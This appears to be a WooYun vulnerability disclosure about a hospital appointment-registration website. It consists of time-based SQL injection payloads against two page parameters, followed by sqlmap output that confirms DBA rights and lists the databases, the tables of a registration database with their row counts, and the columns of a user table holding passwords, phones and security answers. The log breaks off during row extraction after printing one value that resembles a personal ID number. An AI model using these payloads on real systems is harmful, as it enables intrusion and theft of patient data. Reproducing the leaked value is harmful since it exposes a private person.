WooYun.org

http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012

Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:17:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[09:17:15] [INFO] testing if current user is DBA
current user is DBA:    True

Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:09:40] [INFO] testing Microsoft SQL Server
[09:09:41] [INFO] confirming Microsoft SQL Server
[09:09:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
[09:09:43] [INFO] fetching database names
[09:09:43] [INFO] fetching number of databases
[09:09:43] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:09:43] [INFO] retrieved: 10
[09:09:47] [INFO] retrieved: Car
[09:09:59] [INFO] retrieved: demo
[09:10:20] [INFO] retrieved: master
[09:10:48] [INFO] retrieved: model
[09:11:17] [INFO] retrieved: msdb
[09:11:40] [INFO] retrieved: PLATFORM
[09:12:16] [INFO] retrieved: REPAIR
[09:12:40] [INFO] retrieved: tempdb
[09:13:14] [INFO] retrieved: XLIST
[09:13:41] [INFO] retrieved: YYGH
available databases [10]:
[*] Car
[*] demo
[*] master
[*] model
[*] msdb
[*] PLATFORM
[*] REPAIR
[*] tempdb
[*] XLIST
[*] YYGH

Database: YYGH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.IpAddress                  | 444969  |
| dbo.money_all                  | 179048  |
| dbo.reg_user                   | 125311  |
| dbo.Log                        | 62794   |
| dbo.R_PREREGISTER              | 41798   |
| dbo.user_reg                   | 28246   |
| dbo.money_add                  | 25609   |
| dbo.HintDetail                 | 13686   |
| dbo.HintDetail                 | 13686   |
| dbo.QuestionMoney              | 4276    |
| dbo.QuestionMoney              | 4276    |
| dbo.money_t                    | 2562    |
| dbo.YaoFang                    | 2516    |
| dbo.DoctTotal                  | 1018    |
| dbo.DoctInfo                   | 800     |
| dbo.JoinInHospital             | 672     |
| dbo.Memo                       | 480     |
| dbo.JoinInAD                   | 452     |
| dbo.SX_Save                    | 331     |
| dbo.HospitalPaiming            | 270     |
| dbo.ZK_Register                | 237     |
| dbo.LNZY_Log                   | 193     |
| dbo.LNZY_String                | 193     |
| dbo.ZK_ClassCase               | 135     |
| dbo.ZK_MediaReport             | 134     |
| dbo.ZK_AuthorityTechnology     | 131     |
| dbo.Code_Area                  | 129     |
| dbo.ZK_MedicalEquipment        | 122     |
| dbo.temp                       | 119     |
| dbo.LNZY_ScheduleInformation   | 118     |
| dbo.ZK_DoctorInformation       | 78      |
| dbo.MediaReport                | 73      |
| dbo.DiseaseBase                | 72      |
| dbo.DiseaseBase                | 72      |
| dbo.Advice                     | 43      |
| dbo.ZK_ImgNews                 | 40      |
| dbo.lock_user                  | 36      |
| dbo.Code_HosType               | 33      |
| dbo.DeptInfo                   | 32      |
| dbo.Code_Professional          | 24      |
| dbo.ZK_HospitalInformation     | 21      |
| dbo.HealthPressure             | 20      |
| dbo.ZK_DepartmentInformation   | 20      |
| dbo.DoctAdvice                 | 19      |
| dbo.HospitalHot                | 19      |
| dbo.ZK_Admin                   | 19      |
| dbo.ZK_TopicRead               | 17      |
| dbo.SMS                        | 15      |
| dbo.Code_ProfessionalType      | 14      |
| dbo.LNZY_DoctorInformation     | 14      |
| dbo.HealthGuide                | 13      |
| dbo.SX_Return                  | 12      |
| dbo.SX_Return                  | 12      |
| dbo.HospitalRank               | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.HealthHeart                | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.Code_HosLevel              | 9       |
| dbo.NewsQuestion               | 9       |
| dbo.JIBIE                      | 8       |
| dbo.ZK_Flash                   | 8       |
| dbo.Code_Education             | 7       |
| dbo.Code_Blood                 | 6       |
| dbo.Code_Job                   | 6       |
| dbo.Code_Admin                 | 5       |
| dbo.LNZY_DepartmentInformation | 5       |
| dbo.AdminUser                  | 4       |
| dbo.Code_Degree                | 4       |
| dbo.Code_Paper                 | 4       |
| dbo.Code_Practice              | 4       |
| dbo.Code_RH                    | 4       |
| dbo.Code_Sex                   | 4       |
| dbo.Code_Arrange               | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_Level                 | 3       |
| dbo.system32                   | 3       |
| dbo.Health_Lecture             | 2       |
| dbo.Health_Memo                | 2       |
| dbo.Health_Record              | 2       |
| dbo.LNZY_PreRegister           | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.Health_Warning             | 1       |
| dbo.HealthLecture              | 1       |
| dbo.HealthWarning              | 1       |
| dbo.SerialNum                  | 1       |
+--------------------------------+---------+

http://**.**.**.**/zkClassCaseInfo.aspx?Hospital=ZK00000001&ID=1

Payload: Hospital=ZK00000001';WAITFOR DELAY '0:0:5'--&ID=1
---
[10:54:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[10:54:04] [INFO] fetching columns for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] resumed: 25
[10:54:04] [INFO] resumed: answer
[10:54:04] [INFO] resumed: birthday
[10:54:04] [INFO] resumed: email
[10:54:04] [INFO] resumed: id
[10:54:04] [INFO] resumed: job
[10:54:04] [INFO] resumed: money
[10:54:04] [INFO] resumed: name
[10:54:04] [INFO] resumed: now
[10:54:04] [INFO] resumed: oldmoney
[10:54:04] [INFO] resumed: password
[10:54:04] [INFO] resumed: phone
[10:54:04] [INFO] resumed: postcode
[10:54:04] [INFO] resumed: question
[10:54:04] [INFO] resumed: sex
[10:54:04] [INFO] resumed: sf
[10:54:04] [INFO] resumed: sh
[10:54:04] [INFO] resumed: SMS
[10:54:04] [INFO] resumed: tel
[10:54:04] [INFO] resumed: tel1
[10:54:04] [INFO] resumed: username
[10:54:04] [INFO] resumed: vip
[10:54:04] [INFO] resumed: vipfy
[10:54:04] [INFO] resumed: viptime
[10:54:04] [INFO] resumed: WeiXin
[10:54:04] [INFO] resumed: ybk
[10:54:04] [INFO] fetching entries for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] fetching number of entries for table 'reg_user' in database 'Y
YGH'
[10:54:04] [INFO] resumed: 125484
[10:54:04] [INFO] fetching number of distinct values for column 'id'
[10:54:04] [INFO] resumed: 125482
[10:54:04] [INFO] fetching number of distinct values for column 'sf'
[10:54:04] [INFO] resumed: 122102
[10:54:04] [INFO] fetching number of distinct values for column 'sh'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'SMS'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'job'
[10:54:04] [INFO] resumed: 49213
[10:54:04] [INFO] fetching number of distinct values for column 'now'
[10:54:04] [INFO] resumed: 2364
[10:54:04] [INFO] fetching number of distinct values for column 'sex'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'tel'
[10:54:04] [INFO] resumed: 82234
[10:54:04] [INFO] fetching number of distinct values for column 'vip'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'ybk'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'name'
[10:54:04] [INFO] resumed: 86120
[10:54:04] [INFO] fetching number of distinct values for column 'tel1'
[10:54:04] [INFO] resumed: 113967
[10:54:04] [INFO] fetching number of distinct values for column 'email'
[10:54:04] [INFO] resumed: 26924
[10:54:04] [INFO] fetching number of distinct values for column 'money'
[10:54:05] [INFO] resumed: 174
[10:54:05] [INFO] fetching number of distinct values for column 'phone'
[10:54:05] [INFO] resumed: 1
[10:54:05] [INFO] fetching number of distinct values for column 'vipfy'
[10:54:05] [INFO] resumed: 3
[10:54:05] [INFO] fetching number of distinct values for column 'WeiXin'
[10:54:05] [INFO] resumed: 2
[10:54:05] [INFO] fetching number of distinct values for column 'answer'
[10:54:05] [INFO] resumed: 43459
[10:54:05] [INFO] fetching number of distinct values for column 'viptime'
[10:54:05] [INFO] resumed: 806
[10:54:05] [INFO] fetching number of distinct values for column 'birthday'
[10:54:05] [INFO] resumed: 24755
[10:54:05] [INFO] fetching number of distinct values for column 'oldmoney'
[10:54:05] [INFO] resumed: 159
[10:54:05] [INFO] fetching number of distinct values for column 'password'
[10:54:05] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:54:05] [INFO] retrieved: 87403
[10:54:30] [INFO] fetching number of distinct values for column 'postcode'
[10:54:30] [INFO] retrieved: 3088
[10:55:02] [INFO] fetching number of distinct values for column 'question'
[10:55:02] [INFO] retrieved: 19866
[10:55:35] [INFO] fetching number of distinct values for column 'username'
[10:55:35] [INFO] retrieved: 125466
[10:56:01] [WARNING] no proper pivot column provided (with unique values). It wo
n't be possible to retrieve all rows
[10:56:01] [INFO] retrieved: 10000
[10:57:00] [INFO] retrieved: 211223198507210229
[10:59:27] [INFO] retrieved: 1
[10:59:43] [INFO] retrieved: 0
[10:59:55] [INFO] retrieved: